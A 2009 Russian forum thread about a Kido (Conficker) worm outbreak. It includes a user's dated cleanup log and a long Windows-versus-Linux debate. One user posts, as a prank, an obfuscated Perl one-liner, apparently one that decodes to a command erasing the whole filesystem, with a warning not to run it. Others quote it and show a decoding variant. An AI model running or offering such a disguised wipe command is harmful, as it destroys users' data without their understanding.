Появился новый вирус

[Evgenij]

Появился в сети новый вирус. У нас в поселке много компов заразилось. Как сказали мне , пока все антивирусы (на вчерашний день) бессильны. Так как он сам еще не опознан. Убивает системные файлики, в том числе и виндовсный экспровер. После перезагрузки компа на экране появляется только экранная заставка и все. Тоесть ни панели пуск , ни ярлычков ественно нет.

Кто , что про него знает?

Изменено 29 января 2009 пользователем Evgenij

[Vasiliy Armeev]

А нам линуксойдам пох....

 

Вобще можно попробовать поискать на securitylab.

[Evgenij Автор]

Вась , поискать можно, так название его х.з какое и что искать. На ru-board смотрели ,пишут что есть такое, а что это неизвестно.

[MegaVolt]

У нас давно уже гуляет на работе, сисадмины только руками разводят, экплорер я ручками запускаю уже в привычку вошло,

исидиси вместо картинок белый лист показывает и редактировать отказывается, ну и ещё помелочам... вобщем весело, но

больших бед пока не натворил, худо бедно кое как работаем.

[Sensej]

Вот толко до дома добрался, можно написать. А на работе сисадмин бегает между компами(больше 300 компов). До меня не успевает, пока конструкторский и бухгалтерию очистет, так наверно и следующий год настанет

[Владимирыч]

Самое первое и главное правило, ни когда не качайте то, чего не знаете, не лазить на сомнительных сайтах, не читать левую почту!

[Vasiliy Armeev]

Правильно )) Я вон и без антивирусов проблем с вирусами не имею....

 

Вобще проблемы все мы создаем себе сами.

 

А если админы не способны наладить нормальный сервер на линуксе с фаерволом и антивируом, проверяющим все файлы, качаемые юзверями на лету - это хреновый админ. А если у него все юзеры на всех компах с правами админа - ему вобще работать нельзя. Если все грамтоно, вирусов в сети конторской не будет и компами он будет рулить через групповые политики, никуда не бегая.

[Maloi]

У нас давно уже гуляет на работе, сисадмины только руками разводят, экплорер я ручками запускаю уже в привычку вошло,

исидиси вместо картинок белый лист показывает и редактировать отказывается, ну и ещё помелочам... вобщем весело, но

больших бед пока не натворил, худо бедно кое как работаем.

так поставь его в автозагрузку...

[MegaVolt]

так поставь его в автозагрузку...

пытался... его оттуда ветром наверное сдувает, очередное включение и голая заставка в ответ

[Lis2007]

вот как я боролся net-worm.kido.bw сетка из 6 машин.

05.01.2009

Произошла остановка основных служб обеспечения сети (службы: «DHCP», «Сервер», «рабочая станция», «служба обеспечения сети» и т.д.) на файловом сервере ОС Windows server 2003Rus SP2. В результате чего была нарушена работа ЛВС(DHCP - ставил динамические IP адреса). Установленный антивирус «Касперского v6.0.3.837» не выдавал никаких сообщений о наличии вируса, базы сигнатур были установлены на тот момент свежие. Проблема решилась путем установки автоматического перезапуска данных служб при остановке и сбое. (ЗРЯ Я ЭТО СДЕЛАЛ)

 

11.01.2009

Происходили периодические сбои работы на всех рабочих станциях из-за зависания процессов «svchost.exe», «services», пропадала сеть. На всех рабочих станциях стояла стандартная установка антивируса «Касперского» с последними на тот момент базами антивирусных сигнатур, но сообщений о вирусной активности не было.

После ручного запуска сканирования жестких дисков на одной из рабочей станции был обнаружен вирус net-worm32.kido.bw. После ручного запуска на остальных рабочих станциях так же был обнаружен данный вирус в системной папке.

 

12.01.2009

Мной были проведены работы по установке патча, закрывающего уязвимость ОС Windows MS08-067 и одновременный запуск на всех рабочих станциях полного сканирования. Результат- вирус снова восстановился .

 

21.01.2009

После безуспешного сканирования антивирусом Касперского, сканирования дополнительной утилитой лаборатории Касперского утилитой klwk, утилитой launch Dr.Web, утилитой F-Downadup вирус снова восстанавливался или вообще не обнаруживался(хотя я его сам находил и видел), после, мной по прочтенным рекомендациям с сайта www.viruslist.ru были проведены на каждой рабочей станции (c отключением ее от ЛВС) следующие действия:

1. Установка заплатки от майкрософта;

2. Установка Unlocker v1.8.7;

3. Снятие блокировки в %systemroot%/system32 скрытого dll файла размера примерно ~161кб с произвольным именем с помощью утилиты unlocker;

6. После этого указываем антивирусу Касперского на проверку этого файла, после чего этот файл удаляется с перезагрузкой системы;

7. Далее следует экстренное лечение антивирусом Касперского памяти с перезагрузкой;

8. Разблокирование доступа к папке «System Volume Information», «Recycler» для учетной записи с правами администратора и запуска проверки этих папок антивирусом на всех жестких дисках. папка Recycler создается вирусом и на общедоступных ресурсах компьютера и там же лежит необычно большой autorun.inf, даже если нет доступа на запись никому этот файл создается.

9. Удаление с «Назначенные задания» задания с именем Atxx? где хх номер.(если они успеют выполнится то сработает скрипт и в диспечере будет куча процессов с именем Rundll32.exe, я лично убивал эти процессы в менеджере Far)

10. Чистка веток реестра опубликованных в viruslist.com.

11. Полная проверка компьютера антивирусом.

PS

1. КОМПЫ ВО ВРЕМЯ ЛЕЧЕНИЯ ЛУЧШЕ ОТКЛЮЧИТЬ ОТ ЛВС :)

2. Если не стоит антихакер, то нужно поставить(атак проходит меньше. Часть атак фильтруется, но на практике все равно проходит)

3. Вирус еще копирует себя в папку DOCUMENTS AND SETTINGS\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\ под видом графических файлов gif jpg bmp и т д но с ними каспер справляется.

 

 

ps/ Symantec меня подвел:-) кстати года 4 пользовался и ни одного случая заражения не было. сейчас везде стоит касперыч

[Vasiliy Armeev]

Произошла остановка основных служб обеспечения сети (службы: «DHCP», «Сервер», «рабочая станция», «служба обеспечения сети» и т.д.) на файловом сервере ОС Windows server 2003Rus SP2.

 

сервер на венде .... Вот хоть убейте, не понимаю, нафига венда на сервере, зачем? Лишние $100 за лицензию, не понятно нифига. А плюс эти вирусы, трояны и прочая шняга.

чел трахался столько времени, у людей не было сети, тока из-за собственной лени и нежелания поставить нормальную ось :)

[Lis2007]

сервер на венде .... Вот хоть убейте, не понимаю, нафига венда на сервере, зачем? Лишние $100 за лицензию, не понятно нифига. А плюс эти вирусы, трояны и прочая шняга.

чел трахался столько времени, у людей не было сети, тока из-за собственной лени и нежелания поставить нормальную ось :)

я поставил 2003 только из за того что там можно использовать терминальный сервер, а лицензия купленная в торговых рядах "алтын" за 100 руб.

на все есть свои причины. а с линью тоже не мало проблем, имхо.

[lainer]

стоит 3 2003 сервака

и один линь Асп 5

почта на мдемон с антивирем от каспера

все обновляется , каждый час

 

так же прицепом

DrWeb Enerprice - так по моему пишется

в общем проблем нет - тьфу, тьфу , туфу.

Изменено 30 января 2009 пользователем lainer

[Vasiliy Armeev]

я поставил 2003 только из за того что там можно использовать терминальный сервер, а лицензия купленная в торговых рядах "алтын" за 100 руб.

на все есть свои причины. а с линью тоже не мало проблем, имхо.

 

Лицензия за 100 рэ это конечно мощно, я понимаю дома у себя, всё ж не все позволить можем. Но на контору, на сеть. Терминальный сервер это да, если реально нужна винда, без вариантов, но....

 

но службы, обеспечивающие работоспособность сети, лучше держать под лин. отдельно. На сеть (до 50 компов) хватает, ящичка типа P2. Проверено. На таких серверах понимаю DHCP, DNS кеширующий, прокси или нат, настраиваю iptables и всё работет. Аптаймы - по несколько месяцев. Файл-сервер тож туда можно пихнуть с антивирусом. Но это помощнее надо машинку. сделано в 4х конторах как минимум и никаких проблем.

 

Самое главное, компы в сетках контор, хотя там за частую бардак, еще ни разу не заразились через инет, а поскольку большинство файла хранится на файл-серверах и обмен строго через них, вся дрянь, попадающая из других источников, не успевает распространяться.

 

Терминальные серверы отдельно. Даже если там что рухнет, сеть остается работоспособной.

 

А какие проблемы с линь? Ну на твой взгляд.

 

DrWeb'у +1 кстати.

[Menen]

Давно я не сувался в это дело... Но как быть с огничением доступа , в линухе нет актив директ...?

[Lis2007]

А какие проблемы с линь? Ну на твой взгляд.

 

DrWeb'у +1 кстати.

 

Любой юзверь способен базово освоить Линух, напрягаясь не больше чем при том же изучении Винды. Просто Винда это вещь заразная, и после неё юзверя отказываються рационально думать и забивают на всё остальное. это сколько сил надо чтоб обучить юзверей заново? они скажут зачем мне это надо. ИМХО линь ето или сервак или цацка для маняков.

на счет DrWeb, со студенческих лет не нравится. не пользуюсь уже много много лет, может сейчас их продукт не плохой, но я им не пользуюсь.

[Гость myal1969]

А какие проблемы с линь? Ну на твой взгляд.

 

DrWeb'у +1 кстати.

Во многих конторах стоит 1с,а линь это не понимает

[Vasiliy Armeev]

Просто Винда это вещь заразная, и после неё юзверя отказываються рационально думать и забивают на всё остальное. это сколько сил надо чтоб обучить юзверей заново?

 

+1000

 

ИМХО линь ето или сервак или цацка для маняков.

 

сервак -100%, десктоп для тех кому не лень думать.

 

Во многих конторах стоит 1с,а линь это не понимает

 

Серверную часть можно ставить под линь. Для клиентской есть Wine@ethersoft. Проверено - работает.

 

Давно я не сувался в это дело... Но как быть с огничением доступа , в линухе нет актив директ...?

 

Сервер актив.директори можно.... можно и подключить линь клиент

http://forum.ubuntu.ru/index.php?topic=4776.0

http://forum.ubuntu.ru/index.php?topic=17941.0

 

См. хотябы ссылки выше.

 

Кстати, граждане, я и не предлагаю клиентам венду ставить. Пусть им будет как привычнее.

Речь о сервере шла.

[Lis2007]

я вообще и 1 с на терминал повесил и базы, зато пользователи со старыми машинами работают без тормозов. даже досовские проги с таймом идут на ура. запускал одновременно до 20 клиентов полет нормальный.

а на счет линукса я бы сказал так, уже нет такого энтузиазма как раньше, мой метод, работает и очень хорошо, инициатива бывает иногда наказуемой. нисколько не охота поднимать сервак или домен на лине в сетке на несколько компов, ради безопасности. я просто настроил автоматические ежедневные бэкапы, держу образы дисков чтоб если что, можно было востановить за пол часа.

PS. Linux-серверы уязвимы не менее Windows-серверов, а зачастую и гораздо больше. Умногих мнимая убежденность в том, что линь безопаснее, чем Windows.

[Vasiliy Armeev]

PS. Linux-серверы уязвимы не менее Windows-серверов, а зачастую и гораздо больше. Умногих мнимая убежденность в том, что линь безопаснее, чем Windows.

 

Примеры в студию. Чтобы не быть голосоловными.... что может быть с вин. сервером и вин. рабочей станцией мы уже видели (см. выше.). Под линь, разве что пьяный админ и rm -rf / :)

 

Если не знаешь что ты делаешь, можно дров наломать таких что мало не покажется и там и там. В частности в линь у тебя больше свободы, а значит выше риски, без этого никуда, но не более.

 

PS: Ну спорить на самом деле можно до упаду, холивар и че я делаю?

 

Кстати про доктор-веб. Он конечно не самый эффективный в мире антивирус (в тройку входит, ИМХО), но самый удобный, дружелюбный и не навязчивый. У них кстати есть интересное решение http://www.freedrweb.com/livecd/?lng=ru советую всем заиметь болваночку, выручала.

[lainer]

Lis2007

даже я , незнающий очень хорошо

Линя

одним движение руки закрою его так что к нему не подобраться будет вообще ! только админу .

и тем не менее он будет работать . все зависит от кривизны рукчек и извилин в голове , а точнее как написан iptables и какие процессы запущенны и что им разрешено.

Его просто надо уметь готовить .

Винду так не закрыть , однозначно , хоть что там ставь и делая - все равно дырявая как решето, только что сетевой шнурок вытащить!

[Vasiliy Armeev]

Зато под линь можно сделать вот так, под виндой так быстро не выйдет, не хватит прав:

 

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"-;;s;;$_;see'

 

внимание: не повторяйте, если не поняли в чем смысл. Хотя в виртуалке ради смеха можете попробовать.

[евген]

Зато под линь можно сделать вот так, под виндой так быстро не выйдет, не хватит прав:

 

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"-;;s;;$_;see'

 

внимание: не повторяйте, если не поняли в чем смысл. Хотя в виртуалке ради смеха можете попробовать.

 

Сначала кот какойто,которого надо тестить три раза и потом неизвестно,что этот кот выдаст в процентах еще каких ...Чего не понятно

Сложная чтука.Непонятная.Будем заниматся своим делом-где соображаем хоть маненько.

[Lis2007]

Зато под линь можно сделать вот так, под виндой так быстро не выйдет, не хватит прав:

 

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"-;;s;;$_;see'

 

внимание: не повторяйте, если не поняли в чем смысл. Хотя в виртуалке ради смеха можете попробовать.

 

можно и так ;-)

 

$var = '=]=>%-{<-|}<&|`{';

$var =~ tr/ !"#\$%&'()*+,\-.\/:;<=>?@\[\\]^_`{|}/`abcdefghijklmnopqrstuvwxyz{

\/" -/;

s//$var/ee;

а сам попадался на эту удочку?

[Lis2007]

Линь такие как Red Hat и Gentoo, все они на одних заплатках и сидят, мое мнение, по безопасности винда все равно выше. хотя бы заплатки делают быстрее. и пора мне кажется прекратить этот спор, пока будут существовать винда и линь споры будут бесконечными. Давай останемся при своих мнениях, я администрирую сервера на винде меня вполне устраивает его работа и возможности.

[Vasiliy Armeev]

а сам попадался на эту удочку?

Чисто из сопртивного такие штуки проверяю на виртуалке. :) когда то было интресно и rm -rf порверял...

В реале чтоб машину рабочую и тем более сервак увалить - слава богу, ума хватает.

 

 

Спорить то конечно мы бесконечно будем, я об этом выше уже писал.

Пофлудить можно немного.

 

 

PS: Вот что реально садо-мазо, так это генту... это чисто десктопная система, для тех у кого широкий канал и не с кем е*ца по ночам :) Не люблю ни генту ни крусную шапочку. Люблю дебиан и всё что из него растет.

 

На этом кстати сервере тоже дебиан... openVZ и внутири VE на дебиане.

[Vasiliy Armeev]

Вот кстати, насчет красоты и юзабельности :) Мож кому интересно будет.

Мой десктоп, текущая версия, допиленный...

на ноуте домашнем.

Очень удобно, быстро и функционально.

 

ОСь: CrunchBangLinux, понравилась тем что полностью убунтосовместима инормальный опенбокс из коробки. После загрузки жрет 90 (!) метров памяти...

Оконный менеджер - собственно openbox

Бразуер - firefox

торрент - deluge

аська - qutIM

[Vasiliy Armeev]

Извиняюсь за размер картинок, качество чтобы не терялось, увидите так, как вижу я.

[Lis2007]

а henken работать не мешает? а то кроме него больше ничего не видно с первого раза да и со второго :-)

[Vasiliy Armeev]

Так это домашний бучек....нет, не мешает )) обои меняются скриптиком раз в сутки, иногда торможу интересные. Есть задумка сделать оформление на день и на ночь, менять обоину, GTK темы, конфиг conky и т.п. но чет лениво пока. Да вобщем и так комфортно.